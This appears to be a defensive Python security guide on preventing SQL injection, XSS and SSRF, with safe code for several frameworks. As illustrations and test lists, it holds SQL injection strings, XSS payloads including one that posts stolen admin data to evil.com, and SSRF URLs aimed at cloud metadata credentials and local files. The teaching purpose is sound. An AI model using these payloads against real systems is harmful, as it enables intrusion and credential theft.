I’ve been writing Python applications for over a decade, and I’ve seen every possible way to screw up security. The good news? Most Python security issues fall into predictable patterns that you can defend against systematically.
This guide covers the three vulnerabilities that keep showing up in my security reviews: SSRF, SQL injection, and XSS. Master these defenses, and you’ll stop 80% of the attacks before they start.
📊 OWASP 2025 Context: These vulnerabilities map directly to the OWASP Top 10 2025 - SSRF is now part of A01 Broken Access Control, injection dropped to A05 (thanks to better frameworks), while misconfigurations jumped to #2. Understanding the current threat landscape helps you prioritize your security efforts.
The Reality of Python Security
Here’s what I’ve learned from years of security incidents: developers don’t intentionally write vulnerable code. They just don’t realize that requests.get(user_input) or cursor.execute(f"SELECT * FROM users WHERE id={user_id}") are security disasters waiting to happen.
Python’s flexibility is also its weakness. The language lets you do almost anything, which means it’s easy to accidentally create attack vectors. Let’s fix that.
1. SQL Injection: The Classic That Never Dies
SQL injection should be extinct by now, but it’s still the #1 web vulnerability. I review Python apps where developers think f-strings make their code “more readable” - right up until someone dumps their entire user table.
How SQL Injection Actually Works
Let me show you exactly how this attack happens. Here’s vulnerable code I see constantly:
# NEVER DO THIS
def get_user_by_email(email):
query = f"SELECT * FROM users WHERE email = '{email}'"
cursor.execute(query)
return cursor.fetchone()
# What happens with malicious input:
email = "admin@example.com' OR '1'='1' --"
# Resulting query: SELECT * FROM users WHERE email = 'admin@example.com' OR '1'='1' --'
# Result: Returns ALL users
The attacker just broke out of your string parameter and added their own SQL logic. Game over.
The Right Way: Parameterized Queries
Every Python database library supports parameterized queries. Use them religiously.
Raw psycopg2 (PostgreSQL)
import psycopg2
def get_user_by_email_safe(email):
# The %s placeholder is safe - psycopg2 handles escaping
cursor.execute("SELECT * FROM users WHERE email = %s", (email,))
return cursor.fetchone()
def search_products(category, min_price, max_price):
cursor.execute(
"SELECT * FROM products WHERE category = %s AND price BETWEEN %s AND %s",
(category, min_price, max_price)
)
return cursor.fetchall()
SQLite3
import sqlite3
def get_user_orders(user_id, status=None):
if status:
cursor.execute(
"SELECT * FROM orders WHERE user_id = ? AND status = ?",
(user_id, status)
)
else:
cursor.execute(
"SELECT * FROM orders WHERE user_id = ?",
(user_id,)
)
return cursor.fetchall()
SQLAlchemy ORM (Recommended)
from sqlalchemy.orm import Session
from sqlalchemy import text
# ORM queries are automatically parameterized
def get_active_users_by_role(session: Session, role: str):
return session.query(User).filter(
User.role == role,
User.is_active == True
).all()
# For complex raw SQL, use text() with bound parameters
def get_user_statistics(session: Session, start_date, end_date):
result = session.execute(
text("SELECT COUNT(*), AVG(age) FROM users WHERE created_at BETWEEN :start AND :end"),
{"start": start_date, "end": end_date}
)
return result.fetchone()
Dynamic Queries: The Dangerous Zone
Sometimes you need dynamic table names, column names, or ORDER BY clauses. This is where most developers fall into the SQL injection trap.
Wrong Way (Vulnerable)
# DON'T DO THIS
def get_table_data(table_name, order_by):
query = f"SELECT * FROM {table_name} ORDER BY {order_by}"
cursor.execute(query) # SQL injection waiting to happen
Right Way (Safe)
# Use allowlists for dynamic identifiers
ALLOWED_TABLES = {'users', 'products', 'orders'}
ALLOWED_SORT_COLUMNS = {
'users': {'name', 'email', 'created_at'},
'products': {'name', 'price', 'category'},
'orders': {'total', 'created_at', 'status'}
}
def get_table_data(table_name, order_by='id'):
if table_name not in ALLOWED_TABLES:
raise ValueError(f"Invalid table: {table_name}")
if order_by not in ALLOWED_SORT_COLUMNS.get(table_name, set()):
order_by = 'id' # Safe default
# Now we can safely build the query
query = f"SELECT * FROM {table_name} ORDER BY {order_by}"
cursor.execute(query)
return cursor.fetchall()
Django ORM: Built-in Protection
from django.db import models
from django.contrib.auth.models import User
# ORM queries are automatically safe
def get_user_posts(user_id, category=None):
queryset = Post.objects.filter(author_id=user_id)
if category:
queryset = queryset.filter(category=category)
return queryset
# For raw SQL, use params
def get_complex_report(start_date, end_date):
return Post.objects.extra(
where=["created_at BETWEEN %s AND %s"],
params=[start_date, end_date]
)
Flask + SQLAlchemy: Practical Example
from flask import Flask, request, jsonify
from sqlalchemy import create_engine, text
from sqlalchemy.orm import sessionmaker
app = Flask(__name__)
Session = sessionmaker()
@app.route('/api/search')
def search_products():
query = request.args.get('q', '')
category = request.args.get('category')
min_price = request.args.get('min_price', type=float)
max_price = request.args.get('max_price', type=float)
session = Session()
try:
# Build safe parameterized query
sql = """
SELECT id, name, price, category
FROM products
WHERE name ILIKE :query
"""
params = {'query': f'%{query}%'}
if category:
sql += " AND category = :category"
params['category'] = category
if min_price is not None:
sql += " AND price >= :min_price"
params['min_price'] = min_price
if max_price is not None:
sql += " AND price <= :max_price"
params['max_price'] = max_price
result = session.execute(text(sql), params)
products = [dict(row) for row in result.mappings()]
return jsonify(products)
finally:
session.close()
Database-Level Protection
Code fixes aren’t enough. Set up database-level defenses too:
1. Least Privilege Database Users
# Different database users for different operations
DATABASE_CONFIGS = {
'read_only': {
'host': 'db.example.com',
'user': 'app_readonly', # Can only SELECT
'password': os.getenv('DB_READONLY_PASSWORD')
},
'read_write': {
'host': 'db.example.com',
'user': 'app_readwrite', # Can SELECT, INSERT, UPDATE
'password': os.getenv('DB_READWRITE_PASSWORD')
}
}
# Use read-only connection for reports
def generate_report():
with get_connection('read_only') as conn:
# This connection can't modify data even if compromised
return conn.execute("SELECT COUNT(*) FROM users").fetchone()
2. Database Configuration
-- PostgreSQL security settings
-- Disable multiple statements (prevents stacked queries)
SET statement_timeout = '30s';
-- Create restricted user
CREATE USER app_readonly;
GRANT SELECT ON ALL TABLES IN SCHEMA public TO app_readonly;
GRANT USAGE ON SCHEMA public TO app_readonly;
-- No DDL permissions
REVOKE CREATE ON SCHEMA public FROM app_readonly;
Testing for SQL Injection
I always test my parameterized queries with malicious input to make sure they’re really safe:
import pytest
def test_user_search_sql_injection():
# These should not break the query or return extra data
malicious_inputs = [
"' OR '1'='1",
"'; DROP TABLE users; --",
"' UNION SELECT password FROM users --",
"admin'/**/OR/**/'1'='1",
"' OR 1=1#"
]
for malicious_input in malicious_inputs:
# Should return empty result or specific user, never all users
result = get_user_by_email(malicious_input)
assert result is None or len(result) <= 1
Common SQL Injection Mistakes in Python
- Using % formatting:
"SELECT * FROM users WHERE id = %s" % user_id- Don’t do this! - f-strings in SQL:
f"SELECT * FROM {table} WHERE id = {user_id}"- Also vulnerable! - Building WHERE clauses: Concatenating conditions instead of using parameterized queries
- LIKE queries: Not escaping % and _ in user input for LIKE patterns
The Bottom Line on SQL Injection
Use parameterized queries for everything. No exceptions. If you need dynamic table or column names, use allowlists. Test with malicious input. Set up least-privilege database users.
SQL injection is 100% preventable, but only if you never, ever build SQL strings with user input.
2. Cross-Site Scripting (XSS): When User Input Becomes Code
XSS is sneaky because it often works perfectly in development. You type <script>alert('test')</script> into a form field, nothing happens, and you think you’re safe. Then someone tries <img src="x" onerror="fetch('/api/admin/users').then(r=>r.text()).then(data=>fetch('https://evil.com',{method:'POST',body:data}))"> and suddenly your admin data is being stolen.
Understanding the Three Types of XSS
1. Reflected XSS (Immediate)
User input is immediately reflected back in the response:
# Vulnerable Flask route
@app.route('/search')
def search():
query = request.args.get('q', '')
# This is dangerous!
return f"<h1>Results for: {query}</h1><p>No results found.</p>"
# Attack: https://yoursite.com/search?q=<script>alert('XSS')</script>
2. Stored XSS (Persistent)
User input is saved to database and displayed later:
# Vulnerable comment system
def save_comment(user_id, content):
# Stored without sanitization
cursor.execute(
"INSERT INTO comments (user_id, content) VALUES (%s, %s)",
(user_id, content)
)
def display_comments():
comments = cursor.execute("SELECT content FROM comments").fetchall()
# Dangerous! This executes any stored scripts
return "".join(f"<div>{comment[0]}</div>" for comment in comments)
3. DOM-Based XSS (JavaScript)
Happens entirely in JavaScript, often in SPAs:
<!-- Vulnerable JavaScript -->
<script>
const params = new URLSearchParams(window.location.search);
document.getElementById('output').innerHTML = params.get('data'); // Dangerous!
</script>
Django: XSS Protection Done Right
Django’s template system auto-escapes everything by default. This is why Django apps rarely have XSS vulnerabilities:
# views.py
def user_profile(request, user_id):
user = User.objects.get(id=user_id)
return render(request, 'profile.html', {'user': user})
<!-- profile.html - Django template -->
<h1>Welcome, {{ user.name }}!</h1> <!-- Automatically escaped! -->
<p>Bio: {{ user.bio }}</p> <!-- Also escaped! -->
<!-- If user.name contains <script>alert('XSS')</script>,
it renders as: <script>alert('XSS')</script> -->
When you actually need HTML (rare!), sanitize it properly:
import bleach
from django.utils.safestring import mark_safe
def render_user_content(request):
user_html = request.POST.get('content')
# Define allowed tags and attributes
allowed_tags = ['p', 'br', 'strong', 'em', 'ul', 'ol', 'li', 'a']
allowed_attributes = {'a': ['href', 'title']}
# Sanitize the HTML
clean_html = bleach.clean(
user_html,
tags=allowed_tags,
attributes=allowed_attributes,
strip=True
)
return render(request, 'content.html', {
'content': mark_safe(clean_html) # Safe to use mark_safe AFTER bleach
})
Flask + Jinja2: Manual But Secure
Flask uses Jinja2, which also auto-escapes by default:
from flask import Flask, render_template_string, request
import bleach
app = Flask(__name__)
@app.route('/profile/<username>')
def user_profile(username):
user = get_user(username) # Your user lookup function
# Jinja2 auto-escapes this
template = """
<h1>{{ user.name }}</h1>
<p>Joined: {{ user.created_at }}</p>
<p>Bio: {{ user.bio }}</p>
"""
return render_template_string(template, user=user)
@app.route('/comment', methods=['POST'])
def add_comment():
content = request.form.get('content')
# For rich text, sanitize before storing
clean_content = bleach.clean(
content,
tags=['p', 'br', 'b', 'i', 'u', 'a'],
attributes={'a': ['href']},
protocols=['http', 'https', 'mailto']
)
save_comment(request.user.id, clean_content)
return redirect('/comments')
FastAPI: Modern Python Web Framework
from fastapi import FastAPI, Form, Request
from fastapi.templating import Jinja2Templates
from html import escape
app = FastAPI()
templates = Jinja2Templates(directory="templates")
@app.post("/submit-feedback")
async def submit_feedback(request: Request, message: str = Form(...)):
# Manual escaping if needed (though templates auto-escape)
safe_message = escape(message)
return templates.TemplateResponse("feedback.html", {
"request": request,
"message": safe_message # Safe to display
})
JSON APIs and XSS
Even JSON APIs can be vulnerable if the frontend doesn’t handle data properly:
# Backend: Safe JSON response
@app.route('/api/user/<user_id>')
def get_user_api(user_id):
user = get_user(user_id)
return jsonify({
'name': user.name, # Will be JSON-encoded, safe in the response
'bio': user.bio
})
// Frontend: Vulnerable JavaScript
fetch('/api/user/123')
.then(r => r.json())
.then(data => {
// DANGEROUS! Don't use innerHTML with user data
document.getElementById('name').innerHTML = data.name;
// SAFE: Use textContent instead
document.getElementById('bio').textContent = data.bio;
});
Content Security Policy (CSP) Implementation
CSP is your second line of defense. Even if XSS gets through, CSP can block it:
# Flask with CSP
from flask import Flask
from flask_talisman import Talisman
app = Flask(__name__)
# Configure CSP
csp = {
'default-src': "'self'",
'script-src': "'self'", # No inline scripts
'style-src': "'self' 'unsafe-inline'", # Allow inline CSS for now
'img-src': "'self' data: https:",
'font-src': "'self'",
'connect-src': "'self'",
'frame-ancestors': "'none'"
}
Talisman(app, content_security_policy=csp)
@app.route('/')
def home():
return render_template('home.html')
For dynamic scripts, use nonces:
import secrets
from flask import g
@app.before_request
def generate_nonce():
g.csp_nonce = secrets.token_urlsafe(16)
@app.after_request
def add_csp_header(response):
csp = f"script-src 'self' 'nonce-{g.csp_nonce}'"
response.headers['Content-Security-Policy'] = csp
return response
<!-- Template with nonce -->
<script nonce="{{ g.csp_nonce }}">
// This script is allowed
console.log('Protected by CSP');
</script>
Real-World XSS Testing
I test every user input field with these payloads:
XSS_TEST_PAYLOADS = [
"<script>alert('XSS')</script>",
"<img src='x' onerror='alert(1)'>",
"javascript:alert('XSS')",
"<svg onload='alert(1)'>",
"<<SCRIPT>alert('XSS');//<</SCRIPT>",
"<script>fetch('/admin/users').then(r=>r.text()).then(console.log)</script>",
"';alert(String.fromCharCode(88,83,83));//';alert(String.fromCharCode(88,83,83));//",
"\";alert('XSS');//"
]
def test_xss_protection():
for payload in XSS_TEST_PAYLOADS:
response = client.post('/comment', data={'content': payload})
# Payload should be escaped/sanitized in response
assert '<script>' not in response.data.decode()
assert 'alert(' not in response.data.decode()
Framework Comparison: XSS Protection
| Framework | Auto-Escape | Manual Escape Function | CSP Helper |
|---|---|---|---|
| Django | ✅ Always | escape(), mark_safe() | django-csp |
| Flask/Jinja2 | ✅ Default | escape(), Markup() | Flask-Talisman |
| FastAPI | ✅ Via Jinja2 | html.escape() | Manual headers |
| Tornado | ✅ Default | escape.xhtml_escape() | Manual headers |
Common XSS Mistakes in Python
- Disabling auto-escape: Don’t do
{{ content|safe }}without sanitizing first - Building HTML in Python: Concatenating user data into HTML strings
- Trusting “internal” data: Even admin-entered content should be escaped
- JSON in script tags:
<script>var data = {{ json_data }};</script>without proper escaping - Missing CSP: Not implementing Content Security Policy as backup protection
Advanced XSS Protection
For apps that need rich text editing:
import bleach
from bleach_allowlist import markdown_tags, markdown_attrs
def sanitize_markdown_html(content):
"""Safely allow Markdown-generated HTML"""
return bleach.clean(
content,
tags=markdown_tags,
attributes=markdown_attrs,
strip=True
)
def sanitize_user_html(content, strict=True):
"""Sanitize user-provided HTML content"""
if strict:
# For comments, profiles, etc.
allowed_tags = ['p', 'br', 'b', 'i', 'u', 'a', 'ul', 'ol', 'li']
allowed_attrs = {'a': ['href', 'title']}
else:
# For admin/trusted users - more permissive
allowed_tags = markdown_tags + ['div', 'span', 'blockquote']
allowed_attrs = markdown_attrs
return bleach.clean(
content,
tags=allowed_tags,
attributes=allowed_attrs,
protocols=['http', 'https', 'mailto'],
strip=True
)
3. Server-Side Request Forgery (SSRF): When Your Server Becomes the Attack Vector
SSRF is the vulnerability that makes me lose sleep. It’s not just about accessing internal resources - modern SSRF can steal cloud credentials, scan internal networks, and pivot to other systems. I’ve seen a simple “fetch URL” feature turn into complete AWS account compromise.
How SSRF Actually Works
Your application makes HTTP requests based on user input. Seems harmless until someone submits http://169.254.169.254/latest/meta-data/iam/security-credentials/ and walks away with your AWS credentials.
# This innocent-looking code is an SSRF disaster
@app.route(‘/fetch-image’, methods=[‘POST’])
def fetch_image():
url = request.json.get(‘url’)
response = requests.get(url) # DANGEROUS!
# Process image...
return process_image(response.content)
# Attacker payload:
# {“url”: “http://169.254.169.254/latest/meta-data/iam/security-credentials/my-role”}
# Result: Your AWS credentials are now in the attacker’s hands
Understanding the Attack Surface
SSRF attacks target these internal resources:
- Cloud metadata services - AWS/GCP/Azure credential theft
- Internal network services - Admin panels, databases, message queues
- Local files -
/etc/passwd, configuration files viafile:// - Port scanning - Discovery of internal network topology
Building SSRF-Safe URL Validation
Here’s the bulletproof URL validation I use in production:
import ipaddress
import socket
import urllib.parse
from typing import Set, Tuple
class SSRFProtection:
def __init__(self):
# Dangerous IP ranges to block
self.blocked_networks = [
ipaddress.ip_network(“127.0.0.0/8”), # Loopback
ipaddress.ip_network(“10.0.0.0/8”), # Private Class A
ipaddress.ip_network(“172.16.0.0/12”), # Private Class B
ipaddress.ip_network(“192.168.0.0/16”), # Private Class C
ipaddress.ip_network(“169.254.0.0/16”), # Link-local (AWS metadata)
ipaddress.ip_network(“224.0.0.0/4”), # Multicast
ipaddress.ip_network(“240.0.0.0/4”), # Reserved
# IPv6 equivalents
ipaddress.ip_network(“::1/128”), # IPv6 loopback
ipaddress.ip_network(“fc00::/7”), # IPv6 private
ipaddress.ip_network(“fe80::/10”), # IPv6 link-local
]
# Only allow these schemes
self.allowed_schemes = {‘http’, ‘https’}
def validate_url(self, url: str, allowed_hosts: Set[str] = None) -> Tuple[bool, str]:
“””
Validate URL for SSRF safety
Returns: (is_safe, error_message)
“””
try:
parsed = urllib.parse.urlparse(url)
except Exception as e:
return False, f”Invalid URL format: {e}”
# Check scheme
if parsed.scheme not in self.allowed_schemes:
return False, f”Scheme ‘{parsed.scheme}’ not allowed”
# Check if hostname exists
hostname = parsed.hostname
if not hostname:
return False, “Missing hostname”
# Allowlist check (most secure)
if allowed_hosts and hostname not in allowed_hosts:
return False, f”Host ‘{hostname}’ not in allowlist”
# Resolve hostname to IP and check if it’s dangerous
try:
# Get all IPs for this hostname
addr_info = socket.getaddrinfo(hostname, None)
for family, type, proto, canonname, sockaddr in addr_info:
ip = ipaddress.ip_address(sockaddr[0])
# Check against blocked networks
for blocked_net in self.blocked_networks:
if ip in blocked_net:
return False, f”IP {ip} is in blocked range {blocked_net}”
# Additional checks for cloud metadata
if str(ip) == “169.254.169.254”:
return False, “Cloud metadata service access blocked”
except socket.gaierror:
return False, f”Cannot resolve hostname: {hostname}”
except Exception as e:
return False, f”DNS resolution error: {e}”
return True, “OK”
# Usage example
ssrf_protection = SSRFProtection()
def safe_fetch(url: str, allowed_hosts: Set[str] = None) -> requests.Response:
“””Fetch URL safely with SSRF protection”””
is_safe, error = ssrf_protection.validate_url(url, allowed_hosts)
if not is_safe:
raise ValueError(f”SSRF protection: {error}”)
# Additional request safety
response = requests.get(
url,
allow_redirects=False, # Prevent redirect bypasses
timeout=10, # Prevent hanging
stream=True, # Don’t load huge responses
headers={‘User-Agent’: ‘MyApp/1.0’}
)
# Check response size
content_length = response.headers.get(‘content-length’)
if content_length and int(content_length) > 10 * 1024 * 1024: # 10MB limit
raise ValueError(“Response too large”)
return response
Framework-Specific SSRF Protection
Flask Application
from flask import Flask, request, jsonify
import requests
app = Flask(__name__)
ssrf_guard = SSRFProtection()
@app.route(‘/api/fetch-content’, methods=[‘POST’])
def fetch_content():
url = request.json.get(‘url’)
if not url:
return jsonify({‘error’: ‘URL required’}), 400
# Define allowed hosts for this endpoint
allowed_hosts = {‘api.github.com’, ‘api.twitter.com’, ‘httpbin.org’}
try:
response = safe_fetch(url, allowed_hosts)
# Validate content type
content_type = response.headers.get(‘content-type’, ‘’)
if not content_type.startswith(‘application/json’):
return jsonify({‘error’: ‘Only JSON content allowed’}), 400
return jsonify({
‘data’: response.json(),
‘status_code’: response.status_code
})
except ValueError as e:
return jsonify({‘error’: str(e)}), 400
except requests.RequestException as e:
return jsonify({‘error’: f’Request failed: {e}’}), 502
Django Application
from django.http import JsonResponse
from django.views.decorators.csrf import csrf_exempt
from django.utils.decorators import method_decorator
from django.views.generic import View
import json
@method_decorator(csrf_exempt, name=’dispatch’)
class SafeProxyView(View):
def post(self, request):
try:
data = json.loads(request.body)
url = data.get(‘url’)
if not url:
return JsonResponse({‘error’: ‘URL required’}, status=400)
# Allowlist for this specific use case
allowed_hosts = {‘api.example.com’, ‘cdn.trusted.com’}
response = safe_fetch(url, allowed_hosts)
return JsonResponse({
‘content’: response.text[:1000], # Limit response size
‘status’: response.status_code,
‘content_type’: response.headers.get(‘content-type’)
})
except ValueError as e:
return JsonResponse({‘error’: str(e)}, status=400)
except Exception as e:
return JsonResponse({‘error’: ‘Request failed’}, status=502)
Advanced SSRF Attack Vectors
DNS Rebinding Attacks
Attackers can bypass IP validation using DNS:
# Attack scenario:
# 1. evil.com initially resolves to 8.8.8.8 (passes validation)
# 2. Attacker changes DNS to point to 192.168.1.1
# 3. Your server re-resolves and accesses internal network
def dns_rebinding_protection(url: str, max_age_seconds: int = 300):
“””Protect against DNS rebinding by caching DNS resolutions”””
hostname = urllib.parse.urlparse(url).hostname
# Check if we recently validated this hostname
cache_key = f”dns_validation:{hostname}”
last_check = cache.get(cache_key)
if last_check and time.time() - last_check < max_age_seconds:
return True # Recently validated, trust it
# Re-validate the hostname
is_safe, error = ssrf_protection.validate_url(url)
if is_safe:
cache.set(cache_key, time.time(), timeout=max_age_seconds)
return is_safe
Protocol Smuggling
# Block dangerous protocols that can access local files or services
DANGEROUS_SCHEMES = {
‘file’, ‘ftp’, ‘gopher’, ‘dict’, ‘ldap’, ‘ldaps’,
‘tftp’, ‘sftp’, ‘ssh’, ‘scp’, ‘telnet’
}
def validate_scheme(url: str) -> bool:
scheme = urllib.parse.urlparse(url).scheme.lower()
return scheme in {‘http’, ‘https’} and scheme not in DANGEROUS_SCHEMES
Cloud Environment Protection
AWS-Specific Protections
def block_aws_metadata(ip_str: str) -> bool:
“””Block AWS metadata service and other AWS-specific endpoints”””
aws_metadata_ranges = [
“169.254.169.254/32”, # IMDSv1 endpoint
“fd00:ec2::254/128” # IMDSv2 endpoint
]
try:
ip = ipaddress.ip_address(ip_str)
for range_str in aws_metadata_ranges:
if ip in ipaddress.ip_network(range_str):
return True
except ValueError:
pass
return False
# Use IMDSv2 tokens to prevent SSRF access even if network rules fail
def configure_imds_v2():
“””Configure EC2 to require IMDSv2 tokens”””
import boto3
ec2 = boto3.client(‘ec2’)
ec2.modify_instance_metadata_options(
InstanceId=’i-1234567890abcdef0’,
HttpTokens=’required’, # Require IMDSv2 tokens
HttpPutResponseHopLimit=1 # Prevent forwarding
)
Network-Level Protection
# Example firewall rules to block SSRF at network level
def setup_network_protection():
“””Example iptables rules for SSRF protection”””
rules = [
# Block access to metadata service
“iptables -A OUTPUT -d 169.254.169.254 -j REJECT”,
# Block private networks (adjust for your setup)
“iptables -A OUTPUT -d 10.0.0.0/8 -j REJECT”,
“iptables -A OUTPUT -d 172.16.0.0/12 -j REJECT”,
“iptables -A OUTPUT -d 192.168.0.0/16 -j REJECT”,
# Allow specific external services only
“iptables -I OUTPUT -d api.github.com -j ACCEPT”,
“iptables -I OUTPUT -d api.twitter.com -j ACCEPT”,
]
# Note: Apply these rules carefully in production!
return rules
Testing Your SSRF Defenses
def test_ssrf_protection():
“””Comprehensive SSRF testing”””
dangerous_urls = [
# Local network access
“http://127.0.0.1:22”,
“http://localhost:3306”,
“http://192.168.1.1/admin”,
# Cloud metadata
“http://169.254.169.254/latest/meta-data/”,
“http://metadata.google.internal/”,
# Protocol smuggling
“file:///etc/passwd”,
“ftp://internal.server/”,
“gopher://127.0.0.1:1234”,
# DNS tricks
“http://127.0.0.1.nip.io/”, # Resolves to 127.0.0.1
“http://2130706433/”, # 127.0.0.1 in decimal
# IPv6 variants
“http://[::1]/”,
“http://[::ffff:7f00:1]/”,
]
for url in dangerous_urls:
try:
response = safe_fetch(url)
print(f”FAIL: {url} was allowed!”) # Should be blocked
except ValueError as e:
print(f”PASS: {url} blocked - {e}”)
Production SSRF Monitoring
import logging
def log_ssrf_attempt(url: str, user_id: str, error: str):
“””Log potential SSRF attempts for security monitoring”””
logging.warning(
“SSRF attempt blocked”,
extra={
‘security_event’: ‘ssrf_blocked’,
‘url’: url,
‘user_id’: user_id,
‘error’: error,
‘timestamp’: time.time()
}
)
# Could also send to SIEM, trigger alerts, etc.
# Use in your validation function
def safe_fetch_with_logging(url: str, user_id: str) -> requests.Response:
is_safe, error = ssrf_protection.validate_url(url)
if not is_safe:
log_ssrf_attempt(url, user_id, error)
raise ValueError(f”Request blocked: {error}”)
return requests.get(url, timeout=10, allow_redirects=False)
4. Python-Specific Security Patterns
Beyond the big three vulnerabilities, Python has its own security gotchas that can bite you.
Dangerous Deserialization
import pickle
import yaml
# NEVER DO THIS - pickle can execute arbitrary code
user_data = request.get_data()
obj = pickle.loads(user_data) # RCE vulnerability!
# SAFE: Use JSON or safe YAML
import json
data = json.loads(user_input) # Safe - can’t execute code
# For YAML, always use safe_load
data = yaml.safe_load(user_input) # Safe
data = yaml.load(user_input) # DANGEROUS!
Command Injection Prevention
import subprocess
# WRONG: Shell injection waiting to happen
filename = request.form.get(‘filename’)
subprocess.run(f"convert {filename} output.jpg", shell=True) # DANGEROUS!
# RIGHT: Use list format, no shell
filename = secure_filename(request.files[‘image’].filename)
subprocess.run([
‘convert’,
f’uploads/{filename}’,
‘output.jpg’
], shell=False, timeout=30)
Secure File Upload Handling
import os
from werkzeug.utils import secure_filename
UPLOAD_FOLDER = ‘/var/uploads’ # Outside web root!
ALLOWED_EXTENSIONS = {‘png’, ‘jpg’, ‘jpeg’, ‘gif’}
def allowed_file(filename):
return ‘.’ in filename and \
filename.rsplit(‘.’, 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route(‘/upload’, methods=[‘POST’])
def upload_file():
if ‘file’ not in request.files:
return ‘No file selected’, 400
file = request.files[‘file’]
if not allowed_file(file.filename):
return ‘File type not allowed’, 400
# Generate safe filename
filename = secure_filename(file.filename)
# Add random component to prevent collisions/enumeration
import uuid
safe_name = f"{uuid.uuid4()}_{filename}"
file.save(os.path.join(UPLOAD_FOLDER, safe_name))
return f’File uploaded: {safe_name}’
Secure Authentication & Sessions
from flask import Flask, session
import bcrypt
app = Flask(__name__)
app.secret_key = os.environ[‘SECRET_KEY’] # Never hardcode!
# Configure secure session cookies
app.config.update(
SESSION_COOKIE_SECURE=True, # HTTPS only
SESSION_COOKIE_HTTPONLY=True, # No JavaScript access
SESSION_COOKIE_SAMESITE=’Strict’ # CSRF protection
)
def hash_password(password: str) -> str:
"""Hash password securely"""
salt = bcrypt.gensalt()
return bcrypt.hashpw(password.encode(‘utf-8’), salt).decode(‘utf-8’)
def verify_password(password: str, hashed: str) -> bool:
"""Verify password against hash"""
return bcrypt.checkpw(password.encode(‘utf-8’), hashed.encode(‘utf-8’))
5. Security Tooling & CI Integration
Security isn’t just about code - it’s about process. Integrate these tools into your development workflow:
Static Analysis with Bandit
# Install bandit
pip install bandit
# Basic scan
bandit -r myproject/
# Generate report
bandit -r myproject/ -f json -o security_report.json
# Custom config for your project
bandit -r myproject/ -c bandit.yaml
# bandit.yaml - customize for your needs
skips: [‘B101’] # Skip assert usage warnings in tests
tests: [‘B201’, ‘B301’, ‘B401’, ‘B501’] # Only run specific tests
Dependency Scanning
# Check for known vulnerabilities
pip install safety
safety check
# Or use pip-audit (newer, more maintained)
pip install pip-audit
pip-audit
# In requirements.txt, pin versions
requests==2.31.0 # Not requests>=2.0
Pre-commit Hooks
# .pre-commit-config.yaml
repos:
- repo: https://github.com/psf/black
rev: 23.3.0
hooks:
- id: black
- repo: https://github.com/PyCQA/bandit
rev: 1.7.5
hooks:
- id: bandit
args: [‘-c’, ‘bandit.yaml’]
- repo: https://github.com/pyupio/safety
rev: 2.3.4
hooks:
- id: safety
Frequently Asked Questions
Is Django really more secure than Flask?
Django includes more security features by default (CSRF protection, SQL injection prevention, XSS auto-escaping), but a well-configured Flask app can be just as secure. The difference is that Django forces you to think about security from day one, while Flask gives you more rope to hang yourself with.
How do I know if my parameterized queries are really safe?
Test them! Try injecting SQL into your parameters. If get_user("’; DROP TABLE users; --") returns an error instead of deleting your database, you’re good. Also use tools like SQLMap to test your endpoints.
Should I sanitize input or output for XSS prevention?
Always sanitize on output, not input. Store the original user data and escape it when displaying. This way you can change escaping rules later without losing data. Input validation is for data integrity, output escaping is for security.
Can Content Security Policy completely prevent XSS?
CSP is extremely effective but not foolproof. It’s a defense-in-depth measure. You still need proper output encoding because CSP can have bypasses, especially with overly permissive policies.
What’s the most dangerous Python security mistake?
In my experience, it’s using requests.get(user_input) without validation. SSRF attacks can lead to complete infrastructure compromise, especially in cloud environments where you can steal credentials from metadata services.
How do I handle secrets in Python applications?
Never hardcode secrets. Use environment variables for simple cases, or secret management services (AWS Secrets Manager, HashiCorp Vault) for production. Load secrets once at startup, not on every request.
Is it safe to use eval() or exec() with user input?
Never. There’s no safe way to use eval() or exec() with untrusted input. If you need dynamic code execution, use a sandboxed environment or switch to a configuration-driven approach instead.
How often should I update dependencies for security?
Monitor for security updates continuously and apply them quickly. Use tools like Dependabot or Renovate to automate security updates. For major version updates, test thoroughly but don’t delay security patches.
Production Security Checklist
Before deploying your Python application:
Application Level
- All database queries use parameterized statements
- Template auto-escaping is enabled and tested
- User input validation uses allowlists, not denylists
- SSRF protection validates all outbound requests
- File uploads are restricted and stored safely
- Error messages don’t leak sensitive information
- Logging captures security events but not secrets
- Sessions use secure, httpOnly cookies
Infrastructure Level
- HTTPS enforced with HSTS headers
- Content Security Policy implemented
- CORS configured restrictively
- Rate limiting protects against brute force
- Web server configured securely (no server tokens, etc.)
- Firewall blocks internal network access from web tier
- Cloud metadata services blocked or secured
Development Process
- Static analysis tools integrated in CI
- Dependency scanning automated
- Security testing included in test suite
- Secrets never committed to version control
- Regular security training for developers
- Incident response plan documented
The Bottom Line
Most Python security vulnerabilities come down to trusting user input too much. SQL injection happens when you trust input in database queries. XSS happens when you trust input in HTML output. SSRF happens when you trust input in URL requests.
The pattern is always the same: validate input strictly, use framework protections, and test with malicious data.
Security isn’t something you add at the end - it’s a mindset you bring to every line of code you write. Start with these three vulnerabilities, master them completely, and you’ll prevent the vast majority of attacks your application will face.
See also:
- Python SSRF Prevention: Complete Developer Guide — comprehensive SSRF protection for Python frameworks
- Getting Started with Python Requests — secure HTTP client patterns and session handling
- Content Security Policy Guide — browser-based XSS defense strategies
- Common Weakness Enumeration (CWE) — vulnerability classification for SSRF, SQL injection, and XSS